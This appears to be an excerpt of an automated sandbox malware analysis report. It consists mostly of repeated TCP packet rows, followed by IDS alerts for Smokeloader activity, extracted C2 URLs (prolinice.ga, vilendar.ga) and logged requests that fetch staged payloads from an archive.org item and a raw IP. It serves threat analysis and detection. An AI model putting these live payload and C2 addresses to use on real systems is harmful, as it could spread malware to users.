            Source: global traffic | TCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            (The report lists the per-packet rows of this exchange, alternating direction on the same connection; they are condensed to the two directions here.)
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164

            Networking

            Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.22:49167 -> 185.251.91.119:80
            Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.22:49166 -> 185.251.91.119:80
            Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.22:49168 -> 185.251.91.119:80
            Source: Network trafficSuricata IDS: 2049038 - Severity 1 - ET MALWARE Malicious Base64 Encoded Payload In Image : 207.241.232.154:443 -> 192.168.2.22:49164
            Source: C:\Windows\SysWOW64\explorer.exeNetwork Connect: 185.251.91.119 80
            Source: C:\Windows\explorer.exeDomain query: prolinice.ga
            Source: Malware configuration extractorURLs: http://prolinice.ga/index.php
            Source: Malware configuration extractorURLs: http://vilendar.ga/index.php
            Source: global trafficHTTP traffic detected: GET /27/items/vbs_20240726_20240726/vbs.jpg HTTP/1.1Host: ia803104.us.archive.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /90/WEFV.txt HTTP/1.1Host: 23.94.148.16Connection: Keep-Alive
            Source: Joe Sandbox ViewIP Address: 207.241.232.154
            Source: Joe Sandbox ViewASN Name: INTERNET-ARCHIVEUS
            Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS
            Source: Joe Sandbox ViewASN Name: SPRINTHOSTRU
            Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
            Source: Network trafficSuricata IDS: 2829848 - Severity 2 - ETPRO MALWARE SmokeLoader encrypted module (3) : 185.251.91.119:80 -> 192.168.2.22:49166
            Source: global trafficHTTP traffic detected: GET /90/verynicebuttersmoothcakeicream.tIF HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 23.94.148.16Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://cpbrvhywlnsy.com/User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 275Host: prolinice.ga
            Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://prolinice.ga/User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 1395Host: prolinice.ga
            Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wehtwifahcxeheu.com/User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: prolinice.ga
            Source: unknownHTTPS traffic detected: 207.241.232.154:443 -> 192.168.2.22:49164 version: TLS 1.0
            Source: unknownTCP traffic detected without corresponding DNS query: 23.94.148.16
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{FBE20470-930D-4657-894E-45CE94F633FB}.tmp
            Source: powershell.exe, 00000007.00000002.366421069.0000000004F03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
            Source: global trafficDNS traffic detected: DNS query: ia803104.us.archive.org
            Source: global trafficDNS traffic detected: DNS query: prolinice.ga
